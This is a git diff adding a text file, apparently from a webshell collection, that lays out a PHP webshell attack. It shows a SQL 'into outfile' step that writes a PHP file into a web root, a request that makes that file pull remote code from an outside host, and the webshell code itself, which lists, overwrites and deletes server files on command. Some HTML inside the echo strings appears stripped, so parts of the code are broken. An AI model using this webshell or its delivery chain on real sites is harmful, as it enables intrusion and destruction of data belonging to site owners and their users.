diff --git a/php/phpshell.php.txt b/php/phpshell.php.txt
new file mode 100644
index 0000000..dc56e4a
--- /dev/null
+++ b/php/phpshell.php.txt
@@ -0,0 +1,56 @@
+author:园长
+
+sql:
+select '' into outfile'/var/www/html/xxx/data/conf_ads.php'
+
+
+GET:
+http://www.XXX.com.cn/data/conf_ads.php?file=admin3.php&url=http://p2j.cn/1.txt
+
+
+1.txt:
+";
+function getFile($path,$charset) {
+ header("Content-Type:text/html;charset=".$charset);
+ if (is_dir($path)) {
+ $dir = opendir ( $path );
+ while ( $file = readdir ( $dir ) ) {
+ echo "".$file."
";
+ }
+ closedir($dir);
+ } else {
+ echo "File:
+
+
+
";
+ echo "";
+ }
+ echo "";
+}
+function update($filename,$data){
+ file_put_contents($filename, $data);
+ echo "";
+}
+if('update'==$_POST['action']){
+ update($_POST['file'],$_POST['data']);
+}else if('delete'==$_POST['action']){
+ if(file_exists($_POST['file'])){
+ unlink($_POST['file']);
+ echo "";
+ }
+}else{
+ getFile($_POST['p']!=''?$_POST['p']:$_SERVER['DOCUMENT_ROOT'],$_POST['charset']!=''?$_POST['charset']:"UTF-8");
+}
+?>
+
\ No newline at end of file